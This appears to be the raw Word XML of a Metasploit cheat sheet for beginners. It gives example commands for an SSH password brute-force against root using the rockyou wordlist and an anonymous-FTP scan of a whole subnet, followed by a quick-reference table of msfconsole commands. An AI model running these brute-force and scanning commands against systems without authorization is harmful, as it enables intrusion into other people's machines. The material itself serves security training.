        <w:t xml:space="preserve">Auxiliary module - no exploit, just credential testing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use auxiliary/scanner/ssh/ssh_login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set RHOSTS 192.168.1.50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set USERNAME root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set PASS_FILE /usr/share/wordlists/rockyou.txt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set THREADS 10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run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF8C00"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">FTP Anonymous Login Check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use auxiliary/scanner/ftp/anonymous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set RHOSTS 192.168.1.0/24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # scan entire subnet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run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear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FF4444"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Quick Reference - All Essential Commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="FF4444" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF8C00"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigation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44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58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44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3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msfconsole</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Launch Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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0D0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search [keyword]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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0D0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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Search for modules</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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use [module path]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Select a module</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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0D0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info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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0D0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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Show module details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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info -d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Show module details with full docs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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0D0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options</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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0D0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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Show module options</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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show payloads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">List compatible payloads</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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0D0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show targets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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0D0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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">List target OS options</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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set [OPTION] [value]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Set an option</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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0D0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unset [OPTION]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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0D0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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Clear an option</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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setg [OPTION] [value]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Set option globally (persists across modules)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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0D0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run / exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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0D0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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Launch the module</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Check if target is vulnerable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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0D0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back</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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0D0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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Go back to main prompt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">List active sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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0D0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sessions -i [n]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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0D0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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Connect to session number n</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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jobs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">List running background jobs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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0D0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kill [job id]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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0D0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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Kill a background job</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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exit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Exit Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="FF4444" w:sz="4"/>
          <w:bottom w:val="single" w:color="FF4444" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="1A0000" w:val="clear"/>
        <w:spacing w:before="200" w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF4444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Always hack ethically. Get written permission. Stay legal.</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
      <w:pgBorders>
        <w:top w:val="single" w:color="FF4444" w:sz="4" w:space="24"/>
        <w:bottom w:val="single" w:color="FF4444" w:sz="4" w:space="24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CCCCC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FF444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FF8C0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CCCCC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2026-03-28T04:36:58.695Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-28T04:36:58.695Z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